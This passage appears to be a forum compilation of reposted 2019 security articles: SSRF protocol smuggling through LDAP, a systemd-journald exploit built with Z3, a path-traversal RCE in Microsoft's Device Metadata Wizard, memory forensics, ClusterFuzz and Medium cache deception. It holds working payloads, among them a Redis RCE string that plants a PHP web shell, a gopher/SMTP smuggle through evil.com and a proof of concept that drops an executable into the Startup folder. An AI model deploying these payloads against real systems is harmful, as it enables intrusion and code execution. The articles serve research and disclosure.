  8. SSRF Protocol Smuggling in Plaintext Credential Handlers: LDAP

SSRF protocol smuggling involves an attacker injecting one TCP protocol into a dissimilar TCP protocol. A classic example is using gopher (i.e. the first protocol) to smuggle SMTP (i.e. the second protocol):

gopher://127.0.0.1:25/%0D%0AHELO%20localhost%0D%0AMAIL%20FROM%3Abadguy@evil.com%0D%0ARCPT%20TO%3Avictim@site.com%0D%0ADATA%0D%0A ....

The key point above is the use of the CRLF characters (i.e. %0D%0A), which break up the commands of the second protocol. This attack is only possible with the ability to inject CRLF characters into a protocol. Almost all LDAP client libraries support plaintext authentication, or a non-SSL simple bind. For example, the following is an LDAP authentication example using Python 2.7 and the python-ldap library:

import ldap
conn = ldap.initialize("ldap://[SERVER]:[PORT]")
conn.simple_bind_s("[USERNAME]", "[PASSWORD]")

In many LDAP client libraries it is possible to insert a CRLF inside the username or password field. Because LDAP is a fairly plain TCP protocol, this makes it immediately of note.

import ldap
conn = ldap.initialize("ldap://0:9000")
conn.simple_bind_s("1\n2\n3\n", "4\n5\n6---")

You can see the CRLF characters are sent in the request:

# nc -lvp 9000
listening on [::]:9000 ...
connect to [::ffff:127.0.0.1]:9000 from localhost:39250 ([::ffff:127.0.0.1]:39250)
0`1
2
3
4
5
6---

Real World Example

Imagine the case where the user can control the server and the port. This is very common in LDAP configuration settings. For example, there are many web applications that support LDAP configuration as a feature. Some common examples are embedded devices (e.g. webcams, routers), multi-function printers, multi-tenancy environments, and enterprise appliances and applications.

Putting It All Together

If a user can control the server/port and CRLF can be injected into the username or password, this becomes an interesting SSRF protocol smuggle. 
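The CRLF-joined second-protocol payloads used in this kind of smuggling can be built and percent-encoded with a small helper. This is a sketch; the function name is ours.

```python
from urllib.parse import quote

def smuggle(commands):
    """Join second-protocol commands with CRLF and percent-encode the result
    so it can be embedded in a URL or credential field."""
    raw = "\r\n".join(commands) + "\r\n"
    return quote(raw, safe="")

# Rebuilding the SMTP example above from its individual commands:
payload = smuggle([
    "HELO localhost",
    "MAIL FROM:badguy@evil.com",
    "RCPT TO:victim@site.com",
    "DATA",
])
```

The resulting string can then be appended to a gopher:// URL, or smuggled in a bind credential, as shown in the examples.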
For example, here is a Redis remote code execution payload smuggled completely inside the password field of the LDAP authentication in a PHP application. In this case the web root is '/app', and the Redis server would need to be able to write to the web root:

<?php
$adServer = "ldap://127.0.0.1:6379";
$ldap = ldap_connect($adServer);
# RCE smuggled in the password field
$password = "_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2434%0D%0A%0A%0A%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%244%0D%0A/app%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A";
$ldaprdn = 'domain' . "\\" . "1\n2\n3\n";
ldap_set_option($ldap, LDAP_OPT_PROTOCOL_VERSION, 3);
ldap_set_option($ldap, LDAP_OPT_REFERRALS, 0);
$bind = @ldap_bind($ldap, $ldaprdn, urldecode($password));
?>

Client Libraries

In my opinion, the client library is functioning correctly by allowing these characters. Rather, it's the application's job to filter username and password input before passing it to an LDAP client library. I tested four LDAP libraries that are packaged with common languages, all of which allow CRLF in the username or password field:

Library            Tested In
python-ldap        Python 2.7
com.sun.jndi.ldap  JDK 11
php-ldap           PHP 7
net-ldap           Ruby 2.5.2

Summary Points

• If you are an attacker and find an LDAP configuration page, check if the username or password field allows CRLF characters. Typically the initial test will involve sending the request to a listener that you control to verify these characters are not filtered.
• If you are a defender, make sure your application is filtering CRLF characters (i.e. %0D%0A).

Blackhat USA 2019

@AndresRiancho and I (@0xrst) have an outstanding training coming up at Blackhat USA 2019. 
There are two dates available and you should join us!!! It is going to be fun. Sursa: https://www.silentrobots.com/blog/2019/02/06/ssrf-protocol-smuggling-in-plaintext-credential-handlers-ldap/
  9. Justin Steven Published Feb 6, 2019 https://twitch.tv/justinsteven In this stream we rework our exploit for the 64-bit split write4 binary from ROP Emporium (https://ropemporium.com/) - and in doing so we get completely nerd-sniped by a strange ret2system crash.
  10. idenLib - Library Function Identification

When analyzing malware or 3rd-party software, it's challenging to identify statically linked libraries and to understand what a function from such a library is doing.

idenLib.exe is a tool for generating library signatures from .lib files.
idenLib.dp32 is an x32dbg plugin to identify library functions.
idenLib.py is an IDA Pro plugin to identify library functions.

Any feedback is greatly appreciated: @_qaz_qaz

How does idenLib.exe generate signatures?

Parse the input file (.lib file) to get a list of function addresses and function names.
Get the last opcode from each instruction and generate an MD5 hash from it (you can change the hashing algorithm).
Save the signature under the SymEx directory. If the input filename is zlib.lib, the output will be zlib.lib.sig; if zlib.lib.sig already exists under the SymEx directory from a previous execution or from a previous version of the library, the next execution will append any differing signatures. If you execute idenLib.exe several times with different versions of the .lib file, the .sig file will include all unique function signatures.

Signature file format: hash function_name

Generating library signatures

x32dbg, IDA Pro plugin usage:
Copy the SymEx directory under x32dbg/IDA Pro's main directory.
Apply signatures: x32dbg: IDAPro:
Only x86 is supported (adding x64 should be trivial).

Useful links: Detailed information about C Run-Time Libraries (CRT).

Credits
Disassembly powered by Zydis
Icon by freepik

Sursa: https://github.com/secrary/idenLib
  11. Exploiting systemd-journald Part 2

February 6, 2019 By Nick Gregory

Introduction

This is the second part in a multipart series on exploiting two vulnerabilities in systemd-journald, which were published by Qualys on January 9th. In the first post, we covered how to communicate with journald and built a simple proof-of-concept to exploit the vulnerability, using predefined constants for fixed addresses (with ASLR disabled). In this post, we explore how to compute the hash preimages necessary to write a controlled value into libc's __free_hook, as described in part one. This is an important step in bypassing ASLR, as the address of the target location to which we redirect execution (which is system in our case) changes between instances of systemd-journald. Consequently, successful exploitation in the presence of ASLR requires computing a hash preimage dynamically to correspond with the respective address space of that instance of systemd-journald. How to disclose the location of system, and how to write an exploit that completely bypasses ASLR, are beyond the scope of this post.

The Challenge

As noted in the first blog post, we don't directly control the data written to the stack after it has been lowered into libc's memory – the actual values written are the result of hashing our journal entries with jenkins_hashlittle2. Since this is a function pointer we're overwriting, we must have full 64-bit control of the hash output, which can seem like a very daunting task at first, and would indeed be impractical if a cryptographically secure hash were used. However, jenkins_hashlittle2 is not cryptographically secure, and we can use this property to generate preimages for any 64-bit output in just a few seconds. 
The Solution

We can use a tool like Z3 to build a mathematical definition of the hash function and automatically generate an input which satisfies certain constraints (like the output being the address of system, and the input being constrained to the valid entry format).

Z3

Z3 is a theorem prover which gives us the ability to (among other things) easily model and solve logical constraints. Let's take a look at how to use it by going through an example in the Z3 repo. In this example, we want to find if there exists an assignment for variables x and y so that the following conditions hold:

x + y > 5
x > 1
y > 1

It is clear that more than one solution exists to satisfy the above set of constraints. Z3 will inform us if the set of constraints has a solution (is satisfiable), as well as provide us with one assignment to our variables that demonstrates satisfiability. Let's see how Z3 can do so:

from z3 import *
x = Real('x')
y = Real('y')
s = Solver()
s.add(x + y > 5, x > 1, y > 1)
print(s.check())
print(s.model())

This simple example shows how to create variables (e.g. Real('x')), add the constraints that x + y > 5, x > 1, and y > 1 (s.add(x + y > 5, x > 1, y > 1)), check if the given state is satisfiable (i.e. there are values for x and y that satisfy all constraints), and get a set of values for x and y that satisfy the constraints. As expected, running this example yields:

sat
[y = 4, x = 2]

meaning that the stated formula is satisfiable, and that y=4, x=2 is a solution that satisfies the equation.

BitVectors

Not only can Z3 represent arbitrary real numbers, but it can also represent fixed-width integers called BitVectors. 
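Before modeling fixed-width integers in Z3, the wraparound behavior itself can be seen in plain Python by emulating 32-bit two's-complement arithmetic (the helper below is ours, for illustration):

```python
def to_int32(value):
    """Interpret a value modulo 2**32 as a signed 32-bit integer."""
    value &= 0xFFFFFFFF
    return value - 0x100000000 if value & 0x80000000 else value

# Two positive 32-bit values whose sum wraps around to a negative number.
x = 2147451006
y = 2147451006
assert x > 0 and y > 0
assert to_int32(x + y) < 0  # the sum overflows the signed 32-bit range
```

Z3's BitVecs give us exactly this modular behavior for free, without manual masking.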
We can use these to model some more interesting elements of low-level computing, like integer wraparound:

from z3 import *
x = BitVec('x', 32)  # Create a 32-bit wide variable, x
y = BitVec('y', 32)
s = Solver()
s.add(x > 0, y > 0, x+y < 0)  # Constrain x and y to be positive, but their sum to be negative
print(s.check())
print(s.model())

A few small notes here:

Adding two BitVecs of a certain size yields another BitVec of the same size.
Comparisons made by using < and > in Python result in signed comparisons being added to the solver constraints. Unsigned comparisons can be made using Z3-provided functions.

And as we'd expect:

sat
[y = 2147451006, x = 2147451006]

BitVecs give us a very nice way to represent the primitive C types, such as the ones we will need to model the hash function in order to create our preimages.

Transformations

Being able to solve simple equations is great, but in general we will want to reason about more complex operations involving variables. Z3's Python bindings allow us to do this in an intuitive way. For instance (drawing from this Wikipedia example), if we wanted to find a fixed point of the equation f(x) = x^2 - 3x + 4, we can simply write:

def f(x):
    return x**2 - 3*x + 4

x = Real('x')
s = Solver()
s.add(f(x) == x)
s.check()
s.model()

This yields the expected result:

sat
x = 2

Lastly, it's worth noting that Z3's Python bindings provide pretty-printing for expressions. So if we print out f(x) in the above example, we get a nicely formatted representation of what f(x) is symbolically:

x**2 - 3*x + 4

This just scratches the surface of what you can do with Z3, but it's enough for us to begin using Z3 to model jenkins_hashlittle2 and create preimages for it.

Modeling The Hash Function

Input

As noted above, all BitVectors in Z3 have a fixed size, and this is where we run into our first issue. Our hash function, jenkins_hashlittle2, takes a variable-length array of input, which can't be modeled with a fixed-length BitVec. 
So we first need to decide how long our input is going to be. Looking through the hash function's source, we see that it chunks its input into 3 uint32_ts at a time and operates on those. If this is a hash function that uniformly distributes its output, those 12 bytes of input should be enough to cover the 8-byte output space (i.e. all possible 8-byte outputs should be generated by one or more 12-byte inputs), so we should be able to use 12 bytes as our input length. This also has the benefit of never calling the hash's internal state-mixing function, which greatly reduces the complexity of the equations.

length = 12
target = 0x7ffff7a33440  # The address of system() on our ASLR-disabled system
s = Solver()
key = BitVec('key', 8*length)

Input Constraints

Our input (key) has to satisfy several constraints. Namely, it must be a valid journald native entry. As we saw in part one, this means it should resemble "ENTRY_NAME=ENTRY_VALUE". However, there are some constraints on ENTRY_NAME that must be taken into account (as checked by the journal_field_valid function): the name must be less than 64 characters, must start with [A-Z], and must only contain [A-Z0-9_]. The ENTRY_VALUE has no constraints besides not containing a newline character, however. To minimize the total number of constraints Z3 has to solve for, we chose to hard-code the entry format in our model as one uppercase character for the entry name, an equals sign, and then 10 ASCII-printable characters above the control character range for the entry value. To specify this in Z3, we will use the Extract function, which allows us to select slices of a BitVector so that we can apply constraints to each slice. Extract takes three arguments: the high bit, the low bit, and the BitVector to slice. 
char = Extract(7, 0, key)
s.add(char >= ord('A'), char <= ord('Z'))  # First character must be uppercase
char = Extract(15, 8, key)
s.add(char == ord('='))  # Second character must be '='
for char_offset in range(16, 8*length, 8):
    char = Extract(char_offset + 7, char_offset, key)
    s.add(char >= 0x20, char <= 0x7e)  # Subsequent characters must just be in the printable range

Note: Z3's Extract function is very un-Pythonic. It takes the high bit first (inclusive), then the low bit (inclusive), then the source BitVec to extract from. So Extract(7, 0, key) extracts the first byte from key.

The Function Itself

Now that we have our input created and constrained, we can model the function itself. First, we create our Z3 instance of the internal state variables uint32_t a, b, c using the BitVecVal class (which is just a way of creating a BitVec of the specified length with a predetermined value). The predetermined value is the same as in the hashing function: the constant 0xdeadbeef plus the length:

initial_value = 0xdeadbeef + length
a = BitVecVal(initial_value, 32)
b = BitVecVal(initial_value, 32)
c = BitVecVal(initial_value, 32)

Note: The *pc component of the initialization will always be 0, as it's initialized to 0 in the hash64() function, which is what's actually called on our input. We can ignore the alignment checks the hash function does (as we aren't actually dereferencing anything in Z3). We can also skip past the while (length > 12) loop and start in case 12, as our length is hard-coded to be 12. Thus the first bit of code we need to implement is from inside the switch block on the length, at case 12, which adds the three parts of the key to a, b, and c:

a += Extract(31, 0, key)
b += Extract(63, 32, key)
c += Extract(95, 64, key)

Since key is just a vector of bits from the perspective of Z3, in the above code we just Extract the first, second, and third uint32_t – there's no typecasting to do. 
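As a side note, jenkins' rot and final mixing steps can also be reproduced in plain, 32-bit-masked Python, which is handy for sanity-checking candidate preimages outside of Z3. This is our own translation of the public lookup3 macros, not code from the exploit:

```python
MASK = 0xFFFFFFFF

def rot(x, k):
    """32-bit rotate left, equivalent to the C rot() macro."""
    return ((x << k) | (x >> (32 - k))) & MASK

def final(a, b, c):
    """The jenkins 'final' mixing step, translated line for line,
    with explicit masking to emulate uint32_t wraparound."""
    c ^= b; c = (c - rot(b, 14)) & MASK
    a ^= c; a = (a - rot(c, 11)) & MASK
    b ^= a; b = (b - rot(a, 25)) & MASK
    c ^= b; c = (c - rot(b, 16)) & MASK
    a ^= c; a = (a - rot(c, 4)) & MASK
    b ^= a; b = (b - rot(a, 14)) & MASK
    c ^= b; c = (c - rot(b, 24)) & MASK
    return a, b, c
```

Feeding the three Extracted key words through this function should reproduce the b and c values that the Z3 model constrains.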
Following the C source, we next need to implement the final macro, which does the final state mixing to produce the hash output. Looking at the source, it uses another macro (rot), but this is just a simple rotate-left operation. Z3 has rotate-left as a primitive function, so we can make our lives easy by adding an import to our Python:

from z3 import RotateLeft as rot

And then we can simply paste in the macro definition verbatim (well, minus the line-continuation characters):

c ^= b; c -= rot(b, 14)
a ^= c; a -= rot(c, 11)
b ^= a; b -= rot(a, 25)
c ^= b; c -= rot(b, 16)
a ^= c; a -= rot(c, 4)
b ^= a; b -= rot(a, 14)
c ^= b; c -= rot(b, 24)

At this point, the variables a, b, and c contain equations which represent their state when the hash function is about to return. From the source, hash64() combines the b and c out arguments to produce the final 64-bit hash. So we can simply add constraints to our model to denote that b and c are equal to their respective halves of the 64-bit output we want:

s.add(b == (target & 0xffffffff))
s.add(c == (target >> 32))

All that's left at this point is to check the state for satisfiability:

s.check()

Get our actual preimage value from the model:

preimage = s.model()[key].as_long()

And transform it into a string:

input_str = preimage.to_bytes(12, byteorder='little').decode('ascii')

With that, our exploit from part 1 is now fully explained, and can be used on any system where the addresses of libc and the stack are constant (i.e. systems which have ASLR disabled).

Conclusion

Z3 is a very powerful toolkit that can be used to solve a number of problems in exploit development. This blog post has only scratched the surface of its capabilities, but as we've seen, even basic Z3 operations can be used to trivially solve complex problems.

Read Part One of this series

Sursa: https://capsule8.com/blog/exploiting-systemd-journald-part-2/
  12. Wednesday, February 6, 2019

Remote LIVE Memory Analysis with The Memory Process File System v2.0

This blog entry aims to give an introduction to The Memory Process File System and show how easy it is to do high-performance memory analysis, even of live remote systems over the network. This and much more is presented in my BlueHatIL 2019 talk on February 6th. Connect to a remote system over the network over a Kerberos-secured connection. Acquire only the live memory you require to do your analysis/forensics - even over medium latency/bandwidth connections. An easy-to-understand file system user interface, combined with continuous background refreshes made possible by the multi-threaded analysis core, provides an interesting new way of performing incident response by live memory analysis.

Analyzing and dumping remote live memory with the Memory Process File System.

The image above shows the user starting MemProcFS.exe with a connection to the remote computer book-test.ad.frizk.net and with the DumpIt live memory acquisition method. It is then possible to analyze live memory simply by clicking around in the file system. Dumping the physical memory is done by copying the pmem file in the root folder.

Background

The Memory Process File System was released for PCILeech in March 2018, supporting 64-bit Windows, and was used to find the Total Meltdown / CVE-2018-1038 page table permission bit vulnerability in the Windows 7 kernel. People have also used it to cheat in games - primarily cs:go, using it via the PCILeech API. The Memory Process File System was released as a stand-alone project focusing exclusively on memory analysis in November 2018. The initial release included both APIs and plugins for C/C++ and Python. Support was added soon thereafter for 32-bit memory models, and Windows support was expanded as far back as Windows XP.

What is new? 
Version 2.0 of The Memory Process File System marks a major release, published in conjunction with the BlueHatIL 2019 talk Practical Uses for Hardware-assisted Memory Visualization. New functionality includes:

A new separate physical memory acquisition library - the LeechCore.
Live memory acquisition with DumpIt or WinPMEM.
Remote memory capture via a remotely running LeechService.
Support for Microsoft crash dumps and Hyper-V save files.
Full multi-threaded support in the memory analysis library.
Major performance optimizations.

The combination of live memory capture via Comae DumpIt (or the less stable WinPMEM) and secure remote access may be interesting both for convenience and for incident response. It even works remarkably well over medium latency- and bandwidth connections.

The LeechCore library

The LeechCore library, focusing exclusively on memory acquisition, is released as a standalone open source project as part of The Memory Process File System v2 release. The LeechCore library abstracts memory acquisition from analysis and makes things more modular and easier to re-use. The library supports multiple memory acquisition methods - such as:

Hardware: USB3380, PCILeech FPGA and iLO
Live memory: Comae DumpIt and WinPMEM
Dump files: raw memory dump files, full crash dump files and Hyper-V save files.

The LeechCore library also allows for transparently connecting to a remote LeechService running on a remote system over a compressed, mutually authenticated RPC connection secured by Kerberos. Once connected, any of the supported memory acquisition methods may be used.

The LeechService

The LeechService may be installed as a service with the command LeechSvc.exe install. Make sure all necessary dependencies are in the folder of leechsvc.exe - i.e. leechcore.dll and winpmem_x64.sys (if using winpmem). 
The LeechService will write an entry containing the Kerberos SPN to the application event log once started, provided that the computer is part of an Active Directory domain. The LeechService is installed and started with the Kerberos SPN: book-test$@AD.FRIZK.NET. Now connect to the remote LeechService with The Memory Process File System - provided that port 28473 is open in the firewall. The connecting user must be an administrator on the system being analyzed. An event will also be logged for each successful connection. In the example below winpmem is used. Note that winpmem may be unstable on recent Windows 10 systems. Securely connected to the remote system - acquiring and analyzing live memory. It's also possible to start the LeechService in interactive mode. If started in interactive mode, it can be run with DumpIt to provide more stable memory acquisition. It may also be started in insecure no-security mode - which may be useful if the computer is not joined to an Active Directory domain. Using DumpIt to start the LeechSvc in interactive insecure mode. If started in insecure mode, everyone with access to port 28473 will be able to connect and capture live memory. No logs will be written. The insecure mode is not available in service mode. It is only recommended in secure environments in which the target computer is not domain joined. Please also note that it is also possible to start the LeechService in interactive secure mode. To connect to the example system from a remote system, specify: MemProcFS.exe -device dumpit -remote rpc://insecure:<address_of_remote_system>

How do I try it out?

Yes! - both the Memory Process File System and the LeechService are 100% open source. Download The Memory Process File System from GitHub - pre-built binaries are found in the files folder. Also, follow the instructions to install the open source Dokany file system. 
Download the LeechService from GitHub - pre-built binaries with no external dependencies are found in the files folder. Please also note that you may have to download Comae DumpIt or WinPMEM (latest release; install and copy the .sys driver file) to acquire live memory.

The Future

Please keep in mind that this is a hobby project. Since I'm not working professionally with this, future updates may take time and are not guaranteed. The Memory Process File System and the LeechCore are already somewhat mature, with their focus on fast, efficient, multi-threaded live memory acquisition and analysis, even though current functionality is somewhat limited. The plan for the near future is to add additional core functionality - such as page hashing and PFN database support. Page hashing will allow for more efficient remote memory acquisition and better forensics capabilities. PFN database support will strengthen virtual memory support in general. Also, additional and more efficient analysis methods - primarily in the form of new plugins - will be added in the medium term. Support for additional operating systems, such as Linux and macOS, is a long-term goal. It shall however be noted that the LeechCore library is already supported on Linux.

Posted by Ulf Frisk at 2:35 PM

Sursa: http://blog.frizk.net/2019/02/remote-live-memory-analysis-with-memory.html
  13. Remote Code Execution via Path Traversal in the Device Metadata Authoring Wizard Lee Christensen Feb 6 Summary Attackers can use the .devicemanifest-ms and .devicemetadata-ms file extensions for remote code execution in phishing scenarios when the Windows Driver Kit is installed on a victim’s machine. This is possible because the Windows Driver Kit installer installs the Device Metadata Authoring Wizard and associates the .devicemanifest-ms and .devicemetadata-ms file extensions with the program DeviceMetadataWizard.exe. When a victim user opens a maliciously crafted .devicemanifest-ms or .devicemetadata-ms file, an attacker can abuse a path traversal vulnerability in DeviceMetadataWizard.exe to place a file in any writeable directory accessible by the victim user. Writing to certain paths can result in arbitrary code execution (e.g. the user’s Startup folder). Technical Details The .devicemanifest-ms and .devicemetadata-ms file extensions are registered on machines where the Device Metadata Authoring Wizard is installed. This application is part of the Windows Driver Kit and is installed by default on the Azure Visual Studio Community template VMs. It may also be installed when certain features are enabled during the Visual Studio installation process. The program DeviceMetadataWizard.exe handles files with this extension, as seen in the screenshot below showing the file extension association in the registry: Underneath, the .devicemanifest-ms and .devicemetadata-ms files are cabinet files. When a user opens one of these files, DeviceMetadataWizard.exe automatically extracts their contents into the current user’s temp folder. DeviceMetadataWizard.exe’s cabinet extraction is vulnerable to path traversal due to concatenation of the temporary directory’s path with file names in the cabinet file. An attacker can create a malicious cabinet file containing a file whose name contains relative path specifiers (e.g. ..\..\..\file.txt). 
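The core flaw is naive concatenation of the extraction directory with attacker-controlled member names. A sketch of the vulnerable pattern and a safer variant (the function names are ours, not DeviceMetadataWizard.exe's internals, and POSIX-style paths are used for illustration):

```python
import os

def unsafe_extract_path(extract_dir, member_name):
    """The vulnerable pattern: join then normalize, so '..' sequences
    in the member name can escape the extraction directory."""
    return os.path.normpath(os.path.join(extract_dir, member_name))

def safe_extract_path(extract_dir, member_name):
    """Reject members that resolve outside the extraction directory."""
    dest = os.path.normpath(os.path.join(extract_dir, member_name))
    base = os.path.normpath(extract_dir)
    if os.path.commonpath([base, dest]) != base:
        raise ValueError("path traversal attempt: %r" % member_name)
    return dest
```

With a member name like "../../evil.exe", the unsafe version happily resolves to a path outside the temp folder, which is exactly the behavior abused here.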
When a victim user clicks on the malicious .devicemanifest-ms or .devicemetadata-ms file and DeviceMetadataWizard.exe opens, DeviceMetadataWizard.exe will automatically extract the cabinet file, and the file names inside the cabinet archive will be concatenated with the temporary directory's path. If a file in the cabinet archive contains relative path specifiers, then DeviceMetadataWizard.exe will extract the files to an unintended location. As .devicemanifest-ms and .devicemetadata-ms are not subject to Mark of the Web, and therefore not protected by SmartScreen, the file types are candidates for use in targeted phishing attacks.

Proof of Concept

In cmd.exe:

copy C:\windows\system32\cmd.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.exe
makecab.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.exe out.devicemanifest-ms

Now, in your favorite text/hex editor, open out.devicemanifest-ms and replace the string "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.exe" with "..\..\..\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AAAAAAAAAAAA.exe"

Double click on out.devicemanifest-ms

Expected Result

Upon double clicking out.devicemanifest-ms, the file type should fail to load. All embedded files are safely extracted to the temp folder and deleted upon the exit of DeviceMetadataWizard.exe.

Actual Result

Upon double clicking out.devicemanifest-ms, the file fails to load, but DeviceMetadataWizard.exe writes the file "AAAAAAAAAAAA.exe" to the folder C:\users\<user>\appdata\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.

Prevention and Detection Guidance

Only users with the Windows Driver Kit installed are affected by this vulnerability (likely developers). Therefore, the overall attack surface is fairly limited. In terms of prevention, it's very likely that developers do not even use the Device Metadata Authoring Wizard. 
Therefore, consider removing this tool if it's not in use. To reduce the impact of this vulnerability on machines where the tool is used, consider removing the .devicemanifest-ms and .devicemetadata-ms file association handlers by deleting the following registry keys:

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.devicemetadata-ms
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.devicemanifest-ms

Also consider blacklisting the .devicemanifest-ms and .devicemetadata-ms file types using your email and web content filtering appliances. If you have an application whitelisting solution in place, the likelihood of exploitation is greatly decreased, as an attacker would need to leverage an application whitelisting bypass in order to gain arbitrary code execution.

In terms of host-based detections, baseline the normal behavior of DeviceMetadataWizard.exe in your environment and alert on anomalous file writes. In particular, baseline the typical folders where certain file extensions are written (e.g. is it common for any file extension besides .devicemanifest-ms and .devicemetadata-ms to be written outside of the %TEMP% folder?).

Disclosure Timeline

As committed as SpecterOps is to transparency, we acknowledge the speed at which attackers adopt new offensive techniques once they are made public. This is why, prior to publication of a new bug or offensive technique, we regularly inform the respective vendor of the issue, supply ample time to mitigate the issue, and notify select, trusted vendors in order to ensure that detections can be delivered to their customers as quickly as possible.

September 25, 2018 — Initial report to MSRC
September 27, 2018 — Report acknowledgement received from MSRC and case number assigned
October 4, 2018 — MSRC sends email stating they're investigating how to address the issue.
December 18, 2018 — Send email asking for an update.
December 18, 2018 — MSRC responds saying they're still figuring out how to address the issue.
December 19, 2018 — Notified MSRC that a blog post was written and will be released at the beginning of the year, and asked if the issue will be patched by then.
December 19, 2018 — MSRC states it likely won't be patched by January and asks to review the blog post.
Holiday break
January 21, 2019 — MSRC follows up about the blog post.
January 23, 2019 — Responded with the blog post.
January 23, 2019 — MSRC responds and says it will distribute the post to applicable team members.
January 30, 2019 — Inform MSRC of the plan to release the post on February 6 and ask if there's any additional information about the timeline for a patch.
January 30, 2019 — MSRC states that the release date should be okay and that they are still actively discussing the issue and will get back to me in 24 hours.
January 30, 2019 — MSRC states that they plan to fix the issue in a future version of the Windows Driver Kit, but older versions will remain vulnerable since there is no update mechanism for the Windows Driver Kit. MSRC also states that the Windows Defender team has reviewed the post and is considering mitigation options.

Sursa: https://posts.specterops.io/remote-code-execution-via-path-traversal-in-the-device-metadata-authoring-wizard-a0d5839fc54f
  14. httpreplay Replay HTTP and HTTPS requests from a PCAP based on TLS Master Secrets. The TLS Master Secrets can be extracted through mitmproxy, Cuckoo Sandbox, some browsers, and probably some other tools as well. Sursa: https://github.com/hatching/httpreplay
  15. Open sourcing ClusterFuzz Thursday, February 7, 2019 Fuzzing is an automated method for detecting bugs in software that works by feeding unexpected inputs to a target program. It is effective at finding memory corruption bugs, which often have serious security implications. Manually finding these issues is both difficult and time consuming, and bugs often slip through despite rigorous code review practices. For software projects written in an unsafe language such as C or C++, fuzzing is a crucial part of ensuring their security and stability. In order for fuzzing to be truly effective, it must be continuous, done at scale, and integrated into the development process of a software project. To provide these features for Chrome, we wrote ClusterFuzz, a fuzzing infrastructure running on over 25,000 cores. Two years ago, we began offering ClusterFuzz as a free service to open source projects through OSS-Fuzz. Today, we’re announcing that ClusterFuzz is now open source and available for anyone to use. We developed ClusterFuzz over eight years to fit seamlessly into developer workflows, and to make it dead simple to find bugs and get them fixed. ClusterFuzz provides end-to-end automation, from bug detection, to triage (accurate deduplication, bisection), to bug reporting, and finally to automatic closure of bug reports. ClusterFuzz has found more than 16,000 bugs in Chrome and more than 11,000 bugs in over 160 open source projects integrated with OSS-Fuzz. It is an integral part of the development process of Chrome and many other open source projects. ClusterFuzz is often able to detect bugs hours after they are introduced and verify the fix within a day. Check out our GitHub repository. You can try ClusterFuzz locally by following these instructions. In production, ClusterFuzz depends on some key Google Cloud Platform services, but you can use your own compute cluster. 
We welcome your contributions and look forward to any suggestions to help improve and extend this infrastructure. Through open sourcing ClusterFuzz, we hope to encourage all software developers to integrate fuzzing into their workflows. By Abhishek Arya, Oliver Chang, Max Moroz, Martin Barbella and Jonathan Metzman, ClusterFuzz team Sursa: https://opensource.googleblog.com/2019/02/open-sourcing-clusterfuzz.html
  16. Cache Deception: How I discovered a vulnerability in Medium and helped them fix it

Yuval Shprinz
Feb 6

I drew that masterpiece myself

In my previous post, I tried to demonstrate how powerful and cool reverse engineering Android apps can be. I did this by showing how to modify Medium's app so all membership-required stories in it would be available for free. Well, there was a bit more to the story :)

While working towards my desired goal, I found a large collection of API endpoints that Medium declared in their code, which exposed a neat Cache Deception vulnerability after a short iteration on them. I was especially excited about that find because cache-based attacks are exceptionally awesome, and it could have been a great addition to my story. Unfortunately, it took Medium three months and a couple of reminders to respond, so I had to wait with the public disclosure for a bit.

In this post, I will try to explain intuitively what Cache Deception is, describe the bug at Medium, and reference two outstanding articles about cache-based attacks.

Cache Deception

Web browsers cache servers' static responses so they won't need to request them again — saving both time and bandwidth. On the same principle, servers and CDNs (Content Delivery Networks, Cloudflare for example) cache their own responses so they won't need to waste time processing them again. Instead of passing a request to the server when the CDN already knows the response (e.g. for a static image), it can return the response immediately to the client, reducing both server load and response time.

When servers cache static responses, everyone benefits. But what happens when a server caches a non-static response that contains some sensitive information? The server will start serving the cached response to everyone from then on, hence making any sensitive information in it public!
So that's basically what Cache Deception is — making servers cache sensitive data by exploiting badly configured caching rules. After the sensitive data is cached, an attacker can come back to harvest it, for example.

Caching User Profiles

Medium uses the library Retrofit to turn their HTTP APIs into Java interfaces for their Android app, so basically every endpoint lies nicely in their code with all of its available parameters specified. I extracted all of them to a list that ended up being about 900 endpoints.

Some extracted endpoints

That list was a real treasure, so I couldn't stop myself from spending some time iterating over it. Among other things, I looked for URLs that ended with user-controlled input, because there is a common misconfiguration of caching services to cache every resource path that looks like a file.

Remember, our goal is to find endpoints that both contain sensitive information and are cached by Medium's servers. So, finding an API endpoint that's being cached would be great. As it turned out, Medium indeed cached paths that looked like files by default, but only for resources that were right under the root directory of the site, URLs like https://medium.com/niceImage.png.

Fortunately, my beautiful list contained one endpoint that held the above requirements — user profile pages. By setting my username to "yuval.png", my profile page URL became https://medium.com/@yuval.png, and when someone visited it, its response was cached there for a while (4 hours, then the server dropped it). And that was actually the whole bug: setting usernames to end with a file extension in order to cause profile pages to be cached.

What sensitive information can be extracted from cached responses of visits to my profile page?

CSRF tokens. Those are embedded in the returned document. (Cross-Site Request Forgery, in simple words)
Information about who viewed my profile. The currently logged in user can also be extracted from returned documents.
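The misconfiguration behind this kind of bug can be sketched as follows. This is an illustration of the general pattern, not Medium's actual caching code: the flawed rule decides cacheability from the shape of the URL, while a safer rule would trust the origin server's response headers instead.

```python
STATIC_EXTENSIONS = (".png", ".jpg", ".css", ".js")

def looks_like_static_file(path):
    # Flawed heuristic: "directly under the root AND ends in a
    # static-looking extension" => cache it. A dynamic profile page
    # at "/@yuval.png" satisfies both conditions and gets cached.
    directly_under_root = path.count("/") == 1
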